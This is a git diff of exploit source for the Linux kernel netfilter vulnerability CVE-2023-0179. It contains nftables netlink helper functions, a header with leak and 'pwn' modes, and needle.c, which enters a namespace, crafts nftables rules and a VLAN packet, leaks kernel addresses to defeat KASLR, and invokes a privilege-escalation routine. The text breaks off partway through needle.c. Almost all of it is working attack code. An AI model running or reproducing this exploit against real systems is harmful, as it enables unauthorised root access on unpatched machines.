nftnl_expr* e; - e = nftnl_expr_alloc("cmp"); - - nftnl_expr_set_u32(e, NFTA_CMP_OP, op); - nftnl_expr_set_u32(e, 
NFTA_CMP_SREG, sreg); - nftnl_expr_set_data(e, NFTA_CMP_DATA, data, data_len); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len) -{ - struct nftnl_expr* e; - - e = nftnl_expr_alloc("immediate"); - - nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, dreg); - nftnl_expr_set_data(e, NFTA_IMMEDIATE_DATA, data, data_len); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name) -{ - struct nftnl_expr* e; - e = nftnl_expr_alloc("immediate"); - - // dreg = 0 -> verdict - nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, NFT_REG_VERDICT); - nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, verdict); - if (verdict == NFT_GOTO || verdict == NFT_JUMP) { - nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, chain_name); - } - - nftnl_rule_add_expr(r, e); -} - -int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - struct nftnl_table* t = build_table(name, family); - - return send_batch_request( - nl, - NFT_MSG_NEWTABLE | (NFT_TYPE_TABLE << 8), - NLM_F_CREATE, family, (void**)&t, seq, - result_handler - ); -} - -int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - struct nftnl_set* s = build_set(table_name, name, family); - - return send_batch_request( - nl, - NFT_MSG_NEWSET, - NLM_F_CREATE, family, (void**)&s, seq, - result_handler - ); -} - -int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - struct nftnl_chain* c = build_chain(chain_name, table_name, dev_name, base_param); - - return send_batch_request( - nl, - NFT_MSG_NEWCHAIN | (NFT_TYPE_CHAIN << 8), - NLM_F_CREATE, family, (void**)&c, seq, - 
result_handler - ); -} - -int send_packet() -{ - int sockfd; - struct sockaddr_in addr; - char buffer[] = "This is a test message"; - char *interface_name = "vlan.10"; // double-tagged packet - int interface_index; - struct ifreq ifr; - memset(&ifr, 0, sizeof(ifr)); - memcpy(ifr.ifr_name, interface_name, MIN(strlen(interface_name) + 1, sizeof(ifr.ifr_name))); - - sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); - if (sockfd < 0) { - perror("[-] Error creating socket"); - return 1; - } - - // Set the SO_BINDTODEVICE socket option - if (setsockopt(sockfd, SOL_SOCKET, SO_BINDTODEVICE, (void *)&ifr, sizeof(ifr)) < 0) { - perror("[-] Error setting SO_BINDTODEVICE socket option"); - return 1; - } - - memset(&addr, 0, sizeof(addr)); - addr.sin_family = AF_INET; - addr.sin_addr.s_addr = inet_addr("192.168.123.123"); // random destination - addr.sin_port = htons(1337); - - // Send the UDP packet - if (sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&addr, sizeof(addr)) < 0) { - perror("[-] Error sending UDP packet"); - return 1; - } - - close(sockfd); - return 0; +/* + * ---------------------------------------------------------------------------- + * "THE BEER-WARE LICENSE" (Revision 42): + * David Bouman (pql) wrote this file. As long as you retain this notice you + * can do whatever you want with this stuff. If we meet some day, and you think + * this stuff is worth it, you can buy me a beer in return. Signed, David. 
+ * ---------------------------------------------------------------------------- + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "helpers.h" + +unsigned long read_from_file(int line) { + int fd; + char buf[20]; + unsigned long result; + char *endptr; + + fd = open("reg.log", O_RDONLY); + if (fd == -1) { + perror("open"); + exit(1); + } + + if (read(fd, buf, sizeof(buf)) == -1) { + perror("read"); + close(fd); + exit(1); + } + + if (line == 1 && read(fd, buf, sizeof(buf)) == -1) { + perror("read"); + close(fd); + exit(1); + } + + result = strtoul(buf, &endptr, 16); + if (result == ULONG_MAX && endptr == buf) { + fprintf(stderr, "strtoul: invalid argument\n"); + close(fd); + exit(1); + } + close(fd); + return result; +} + +static uint64_t default_batch_req_handler(struct mnl_socket* nl, int portid, int table_seq) +{ + char buf[MNL_SOCKET_BUFFER_SIZE]; + + int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + + while (ret > 0) { + ret = mnl_cb_run(buf, ret, table_seq, portid, NULL, NULL); + if (ret <= 0) break; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + return ret; +} + +int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct mnl_nlmsg_batch* batch = mnl_nlmsg_batch_start(buf, sizeof buf); + uint8_t msg_type = msg & 0xff; + uint8_t nft_type = (msg >> 8) & 0xff; + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); + int table_seq = *seq; + struct nlmsghdr* nlh; + + if (result_handler == NULL) { + result_handler = default_batch_req_handler; + } + + if (msg == NFT_MSG_NEWSET) { + nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, family, + 
msg_flags | NLM_F_ACK, (*seq)++); + } else { + nlh = nftnl_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + msg_type, family, + msg_flags | NLM_F_ACK, (*seq)++ + ); + } + if (msg == NFT_MSG_NEWSET) { + nftnl_set_nlmsg_build_payload(nlh, *object); + nftnl_set_free(*object); + } else { + switch(nft_type) { + case NFT_TYPE_TABLE: + nftnl_table_nlmsg_build_payload(nlh, *object); + nftnl_table_free(*object); + break; + case NFT_TYPE_CHAIN: + nftnl_chain_nlmsg_build_payload(nlh, *object); + nftnl_chain_free(*object); + break; + case NFT_TYPE_RULE: + nftnl_rule_nlmsg_build_payload(nlh, *object); + // offload mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2)); + nftnl_rule_free(*object); + break; + default: + return -1; + } + } + + *object = NULL; + + mnl_nlmsg_batch_next(batch); + nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); + + int ret = mnl_socket_sendto( + nl, + mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch) + ); + + if (ret < 0) { + perror("mnl_socket_send"); + return -1; + } + + int portid = mnl_socket_get_portid(nl); + + mnl_nlmsg_batch_stop(batch); + + result_handler(nl, portid, table_seq); +} + +struct nftnl_table* build_table(char* name, uint16_t family) +{ + struct nftnl_table* t = nftnl_table_alloc(); + + nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + + return t; +} + +struct nftnl_chain* build_chain(char* table_name, char* chain_name, char *dev_name, struct unft_base_chain_param* base_param) +{ + struct nftnl_chain* c; + + c = nftnl_chain_alloc(); + + nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name); + if (dev_name) + nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); + + if (base_param) { + nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num); + nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio); + } + + return c; +} + +struct nftnl_rule* build_rule(char* 
table_name, char* chain_name, uint16_t family, uint64_t* handle) +{ + struct nftnl_rule* r = NULL; + uint8_t proto; + + r = nftnl_rule_alloc(); + + nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table_name); + nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain_name); + nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family); + + if (handle) { + nftnl_rule_set_u64(r, NFTNL_RULE_POSITION, *handle); + } + + return r; +} + +struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family) +{ + // Create a new set object + struct nftnl_set *set = nftnl_set_alloc(); + + nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); + nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_MAP); + nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); + nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, 4); + nftnl_set_set_u32(set, NFTNL_SET_DATA_LEN, 4); + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); + nftnl_set_set_u32(set, NFTNL_SET_ID, 1); + + //nftnl_set_add_expr(set, expr); + return set; +} + +#define NFTA_BITWISE_OP NFTA_BITWISE_XOR + 1 +#define NFTA_BITWISE_DATA NFTA_BITWISE_OP + 1 + +void rule_add_bit_shift( + struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len, + uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len) +{ + + if(bitwise_len > 0xff) { + puts("bitwise_len > 0xff"); + exit(EXIT_FAILURE); + } + + struct nftnl_expr* e; + e = nftnl_expr_alloc("bitwise"); + + nftnl_expr_set_u32(e, NFTA_BITWISE_SREG, bitwise_sreg); + nftnl_expr_set_u32(e, NFTA_BITWISE_DREG, bitwise_dreg); + nftnl_expr_set_u32(e, NFTA_BITWISE_OP, shift_type); + nftnl_expr_set_u32(e, NFTA_BITWISE_LEN, bitwise_len); + nftnl_expr_set_data(e, NFTA_BITWISE_DATA, data, data_len); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg) +{ + uint32_t data = 0; + rule_add_bit_shift(r, NFT_BITWISE_LSHIFT, len, sreg, dreg, &data, sizeof(data)); +} + +void 
rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) +{ + struct nftnl_expr *expr = nftnl_expr_alloc("dynset"); + nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_UPDATE); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SET_ID, 1); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, reg_key); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_DATA, reg_data); + nftnl_rule_add_expr(r, expr); +} + +void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) +{ + struct nftnl_expr *expr = nftnl_expr_alloc("lookup"); + nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, set_name); + nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, 1); + nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, reg_key); + nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, reg_data); + nftnl_rule_add_expr(r, expr); +} + +void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg) +{ + struct nftnl_expr* e; + e = nftnl_expr_alloc("payload"); + + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_BASE, base); + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_OFFSET, offset); + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_LEN, len); + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_DREG, dreg); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len) +{ + struct nftnl_expr* e; + e = nftnl_expr_alloc("cmp"); + + nftnl_expr_set_u32(e, NFTA_CMP_OP, op); + nftnl_expr_set_u32(e, NFTA_CMP_SREG, sreg); + nftnl_expr_set_data(e, NFTA_CMP_DATA, data, data_len); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len) +{ + struct nftnl_expr* e; + + e = nftnl_expr_alloc("immediate"); + + nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, dreg); + nftnl_expr_set_data(e, NFTA_IMMEDIATE_DATA, data, data_len); + 
+ nftnl_rule_add_expr(r, e); +} + +void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name) +{ + struct nftnl_expr* e; + e = nftnl_expr_alloc("immediate"); + + // dreg = 0 -> verdict + nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, NFT_REG_VERDICT); + nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, verdict); + if (verdict == NFT_GOTO || verdict == NFT_JUMP) { + nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, chain_name); + } + + nftnl_rule_add_expr(r, e); +} + +int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + struct nftnl_table* t = build_table(name, family); + + return send_batch_request( + nl, + NFT_MSG_NEWTABLE | (NFT_TYPE_TABLE << 8), + NLM_F_CREATE, family, (void**)&t, seq, + result_handler + ); +} + +int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + struct nftnl_set* s = build_set(table_name, name, family); + + return send_batch_request( + nl, + NFT_MSG_NEWSET, + NLM_F_CREATE, family, (void**)&s, seq, + result_handler + ); +} + +int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + struct nftnl_chain* c = build_chain(chain_name, table_name, dev_name, base_param); + + return send_batch_request( + nl, + NFT_MSG_NEWCHAIN | (NFT_TYPE_CHAIN << 8), + NLM_F_CREATE, family, (void**)&c, seq, + result_handler + ); +} + +int send_packet() +{ + int sockfd; + struct sockaddr_in addr; + char buffer[] = "This is a test message"; + char *interface_name = "vlan.10"; // double-tagged packet + int interface_index; + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + memcpy(ifr.ifr_name, interface_name, MIN(strlen(interface_name) + 1, sizeof(ifr.ifr_name))); + + sockfd = socket(AF_INET, 
SOCK_DGRAM, IPPROTO_UDP); + if (sockfd < 0) { + perror("[-] Error creating socket"); + return 1; + } + + // Set the SO_BINDTODEVICE socket option + if (setsockopt(sockfd, SOL_SOCKET, SO_BINDTODEVICE, (void *)&ifr, sizeof(ifr)) < 0) { + perror("[-] Error setting SO_BINDTODEVICE socket option"); + return 1; + } + + memset(&addr, 0, sizeof(addr)); + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("192.168.123.123"); // random destination + addr.sin_port = htons(1337); + + // Send the UDP packet + if (sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&addr, sizeof(addr)) < 0) { + perror("[-] Error sending UDP packet"); + return 1; + } + + close(sockfd); + return 0; } \ No newline at end of file diff --git a/cve/linux-kernel/2023/CVE-2023-0179/helpers.h b/cve/linux-kernel/2023/CVE-2023-0179/helpers.h index f62b1c1d42638d786230b9c8eb2f6e52c83d2339..54ad08deabc69db447581f370a7bf54f6e99c929 100644 --- a/cve/linux-kernel/2023/CVE-2023-0179/helpers.h +++ b/cve/linux-kernel/2023/CVE-2023-0179/helpers.h 
@@ -1,60 +1,60 @@
-/*
- * ----------------------------------------------------------------------------
- * "THE BEER-WARE LICENSE" (Revision 42):
- * David Bouman (pql) wrote this file. As long as you retain this notice you
- * can do whatever you want with this stuff. If we meet some day, and you think
- * this stuff is worth it, you can buy me a beer in return. Signed, David.
- * ----------------------------------------------------------------------------
- */
-
-#pragma once
-#include
-#define MIN(a, b) ((a) < (b) ? (a) : (b))
-#define VLAN_HLEN 4
-#define VLAN_ETH_HLEN 18
-
-enum nft_types {
- NFT_TYPE_TABLE = 0,
- NFT_TYPE_CHAIN,
- NFT_TYPE_RULE,
- NFT_TYPE_SET
-};
-
-enum mode {
- LEAK_ONLY = 1,
- LEAK_AND_PWN
-};
-
-struct unft_base_chain_param {
- uint32_t hook_num;
- uint32_t prio;
-};
-
-// build helpers
-struct nftnl_table* build_table(char* name, uint16_t family);
-struct nftnl_chain* build_chain(char* table_name, char* chain_name, char* dev_name, struct unft_base_chain_param* base_param);
-struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle);
-struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family);
-
-// create helpers (actually commits to the kernel)
-int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*handler)(struct mnl_socket*, int, int));
-
-int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
-int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
-int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
-
-// expression helpers
-void rule_add_bit_shift(
- struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len,
- uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len);
-void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg);
-void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg);
-void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len);
-void add_payload(struct nftnl_rule *r, uint32_t base, uint32_t dreg, uint32_t offset, uint32_t len);
-void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
-void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
-void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len);
-void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name);
-
-int send_packet();
+/*
+ * ----------------------------------------------------------------------------
+ * "THE BEER-WARE LICENSE" (Revision 42):
+ * David Bouman (pql) wrote this file. As long as you retain this notice you
+ * can do whatever you want with this stuff. If we meet some day, and you think
+ * this stuff is worth it, you can buy me a beer in return. Signed, David.
+ * ----------------------------------------------------------------------------
+ */
+
+#pragma once
+#include
+#define MIN(a, b) ((a) < (b) ? (a) : (b))
+#define VLAN_HLEN 4
+#define VLAN_ETH_HLEN 18
+
+enum nft_types {
+ NFT_TYPE_TABLE = 0,
+ NFT_TYPE_CHAIN,
+ NFT_TYPE_RULE,
+ NFT_TYPE_SET
+};
+
+enum mode {
+ LEAK_ONLY = 1,
+ LEAK_AND_PWN
+};
+
+struct unft_base_chain_param {
+ uint32_t hook_num;
+ uint32_t prio;
+};
+
+// build helpers
+struct nftnl_table* build_table(char* name, uint16_t family);
+struct nftnl_chain* build_chain(char* table_name, char* chain_name, char* dev_name, struct unft_base_chain_param* base_param);
+struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle);
+struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family);
+
+// create helpers (actually commits to the kernel)
+int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*handler)(struct mnl_socket*, int, int));
+
+int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
+int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
+int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
+
+// expression helpers
+void rule_add_bit_shift(
+ struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len,
+ uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len);
+void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg);
+void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg);
+void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len);
+void add_payload(struct nftnl_rule *r, uint32_t base, uint32_t dreg, uint32_t offset, uint32_t len);
+void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
+void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
+void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len);
+void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name);
+
+int send_packet();
 unsigned long read_from_file(int line);
\ No newline at end of file
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/needle.c b/cve/linux-kernel/2023/CVE-2023-0179/needle.c
index ddf91334903d64dcad5b54d09385b7d5e1566a30..c1e775120172d9525735c891aa3cf628001727bd 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/needle.c
+++ b/cve/linux-kernel/2023/CVE-2023-0179/needle.c
@@ -1,141 +1,141 @@
-#define _GNU_SOURCE 1
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#include "helpers.h"
-#include "exploit.h"
-
-int main(int argc, char** argv, char** envp)
-{
- // Use unique thread stack
- cpu_set_t set;
- CPU_ZERO(&set);
- CPU_SET(0, &set);
- sched_setaffinity(getpid(), sizeof(cpu_set_t), &set);
-
- enum mode choice;
-
- // cool trick from https://github.com/pqlx/CVE-2022-1015/blob/master/pwn.c
- if (argc < 2) {
- puts("[+] Dropping into network namespace");
-
- char* new_argv[] = {
- "/usr/bin/unshare",
- "-Urn",
- argv[0],
- "EXPLOIT",
- NULL
- };
-
- execve(new_argv[0], new_argv, envp);
- puts("Couldn't start unshare wrapper..");
- puts("Recompile the exploit with an appropriate unshare path.");
- exit(EXIT_FAILURE);
- }
- if (strcmp("EXPLOIT", argv[1])) {
- puts("[-] Something went wrong...");
- exit(EXIT_FAILURE);
- }
-
- puts("Choose an option:");
- puts(" 1. Leak kernel TEXT address and regs address");
- puts(" 2. Run the exploit");
-
- scanf("%d", (int *) &choice);
-
- char *table_name = "mytable",
- *base_chain_name = "base_chain",
- *exploit_chain_name = "exploit_chain",
- *set_name = "myset12",
- *dev_name = "eth0";
-
- puts("[+] Setting up the network namespace environment");
- system("./setup.sh");
-
- struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
- if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
- perror("[-] mnl_socket_bind");
- puts("[-] Check your CAP_NET_ADMIN capability");
- exit(EXIT_FAILURE);
- }
-
- // Wait for local traffic to cool down
- sleep(5);
-
- int seq = time(NULL);
- if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) {
- perror("[-] Failed creating table");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created table %s\n", table_name);
-
- struct unft_base_chain_param bp;
- // NF_INET_PRE_ROUTING and NF_BR_LOCAL_IN shoud also work
- bp.hook_num = NF_NETDEV_INGRESS;
- bp.prio = INT_MIN;
- if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) {
- perror("[-] Failed creating base chain");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created base chain %s\n", base_chain_name);
-
- if (create_chain(nl, table_name, exploit_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
- perror("[-] Failed creating exploit chain");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created exploit chain %s\n", base_chain_name);
-
- if (create_set(nl, table_name, set_name, NFPROTO_NETDEV, &seq, NULL)) {
- perror("[-] Failed creating set");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created exploit set\n");
-
- if (create_base_chain_rule_leak(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
- perror("[-] Failed creating base chain rule");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created base chain rule\n");
-
- uint8_t offset = 19, len = 4, vlan_hlen = 4;
- uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen;
- unsigned long found_addr;
- unsigned long found_instr;
- if (create_exploit_chain_rule_leak(nl, table_name, exploit_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len)) {
- perror("[-] Failed creating base chain rule");
- return EXIT_FAILURE;
- }
- printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen);
- puts("[+] Successfully created exploit chain rule!");
- if (send_packet() == 0) {
- system("nft list map netdev mytable myset12 | ./run.sh > reg.log");
- found_addr = read_from_file(0);
- found_instr = read_from_file(1);
- printf("[+] Found regs address: 0x%lx\n", found_addr);
- printf("[+] Found instr address: 0x%lx\n", found_instr);
- printf("[+] KASLR slide: 0x%lx\n", found_instr - INSTR_BASE);
- system("nft delete table netdev mytable");
- }
-
- if (choice == LEAK_AND_PWN) {
- printf("[+] Inserting the needle into address 0x%lx\n", found_addr);
- sleep(5);
- return pwn(nl, found_addr, found_instr);
- }
- return EXIT_SUCCESS;
-}
+#define _GNU_SOURCE 1
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include "helpers.h"
+#include "exploit.h"
+
+int main(int argc, char** argv, char** envp)
+{
+ // Use unique thread stack
+ cpu_set_t set;
+ CPU_ZERO(&set);
+ CPU_SET(0, &set);
+ sched_setaffinity(getpid(), sizeof(cpu_set_t), &set);
+
+ enum mode choice;
+
+ // cool trick from https://github.com/pqlx/CVE-2022-1015/blob/master/pwn.c
+ if (argc < 2) {
+ puts("[+] Dropping into network namespace");
+
+ char* new_argv[] = {
+ "/usr/bin/unshare",
+ "-Urn",
+ argv[0],
+ "EXPLOIT",
+ NULL
+ };
+
+ execve(new_argv[0], new_argv, envp);
+ puts("Couldn't start unshare wrapper..");
+ puts("Recompile the exploit with an appropriate unshare path.");
+ exit(EXIT_FAILURE);
+ }
+ if (strcmp("EXPLOIT", argv[1])) {
+ puts("[-] Something went wrong...");
+ exit(EXIT_FAILURE);
+ }
+
+ puts("Choose an option:");
+ puts(" 1. Leak kernel TEXT address and regs address");
+ puts(" 2. Run the exploit");
+
+ scanf("%d", (int *) &choice);
+
+ char *table_name = "mytable",
+ *base_chain_name = "base_chain",
+ *exploit_chain_name = "exploit_chain",
+ *set_name = "myset12",
+ *dev_name = "eth0";
+
+ puts("[+] Setting up the network namespace environment");
+ system("./setup.sh");
+
+ struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
+ if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
+ perror("[-] mnl_socket_bind");
+ puts("[-] Check your CAP_NET_ADMIN capability");
+ exit(EXIT_FAILURE);
+ }
+
+ // Wait for local traffic to cool down
+ sleep(5);
+
+ int seq = time(NULL);
+ if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) {
+ perror("[-] Failed creating table");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created table %s\n", table_name);
+
+ struct unft_base_chain_param bp;
+ // NF_INET_PRE_ROUTING and NF_BR_LOCAL_IN shoud also work
+ bp.hook_num = NF_NETDEV_INGRESS;
+ bp.prio = INT_MIN;
+ if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) {
+ perror("[-] Failed creating base chain");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created base chain %s\n", base_chain_name);
+
+ if (create_chain(nl, table_name, exploit_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
+ perror("[-] Failed creating exploit chain");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created exploit chain %s\n", base_chain_name);
+
+ if (create_set(nl, table_name, set_name, NFPROTO_NETDEV, &seq, NULL)) {
+ perror("[-] Failed creating set");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created exploit set\n");
+
+ if (create_base_chain_rule_leak(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
+ perror("[-] Failed creating base chain rule");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created base chain rule\n");
+
+ uint8_t offset = 19, len = 4, vlan_hlen = 4;
+ uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen;
+ unsigned long found_addr;
+ unsigned long found_instr;
+ if (create_exploit_chain_rule_leak(nl, table_name, exploit_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len)) {
+ perror("[-] Failed creating base chain rule");
+ return EXIT_FAILURE;
+ }
+ printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen);
+ puts("[+] Successfully created exploit chain rule!");
+ if (send_packet() == 0) {
+ system("nft list map netdev mytable myset12 | ./run.sh > reg.log");
+ found_addr = read_from_file(0);
